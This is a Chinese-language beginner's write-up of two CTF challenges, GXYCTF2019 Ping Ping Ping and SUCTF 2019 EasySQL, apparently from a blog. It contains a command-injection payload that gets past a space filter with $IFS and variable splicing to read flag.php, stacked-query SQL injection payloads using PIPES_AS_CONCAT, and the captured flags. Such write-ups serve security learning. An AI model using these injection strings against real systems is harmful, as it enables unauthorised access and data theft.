[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程

1、GXYCTF2019Ping Ping Ping 1

我们直接查看flag.php,提示我们/?ip= fxck your space!,无法直接查看flag.php,需要绕过空格。

[http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php](http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php "http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php")

<!--?php

$flag = "flag{0b46a562-1574-4bfe-87ae-356928a78954}";

?-->

2、SUCTF 2019EasySQL 1

随便输入一个数字回显Array ( 0 => 1 ),输入其他内容回显Nonono。

猜测该系统后台代码为:select $_POST'query' || flag from flag 1 ,且那么直接在1前面拼接*,即*,1,解得flag:

flag{4151e8ed-491a-4c8b-bc72-c076522a4936}

1;show tables; 发现Flag表

构造payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1 ,相当于是将select 1 和 select flag from Flag 的结果拼接在一起,也就是 select 1;的结果拼接select flag from Flag的结果。

相关推荐
黄俊懿2 分钟前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第八节:网关-注入攻击与预防
sql·网络安全·架构·系统架构·架构师·架构设计
吴声子夜歌12 分钟前
Java——开发中通用的方法和准则(二)
java·开发语言·php
黄俊懿31 分钟前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第七节:网关-XSS攻击与预防
网关·网络安全·架构·系统架构·架构师·xss·架构设计
数据知道34 分钟前
.NET 反序列化漏洞——ViewState 与 BinaryFormatter 实战深度剖析
网络·网络安全·.net
2601_962065492 小时前
PHP For 循环
android·java·php
宁之明起(B服)2 小时前
FastJson(Vulhub靶场)
安全
2601_962065492 小时前
interface GigabitEthernet0/0/0
服务器·php·apache
亚川楼宇自控系统数据中心厂家3 小时前
解码NTPS技术:为数据中心电能安全保驾护航
安全
虎王物联3 小时前
PHP Swoole实现物联网MQTT数据订阅与WebSocket实时推送
物联网·mqtt·websocket·php·swoole
Bruce_Liuxiaowei3 小时前
2026年8月第4周网络安全形势周报
人工智能·安全·web安全·智能体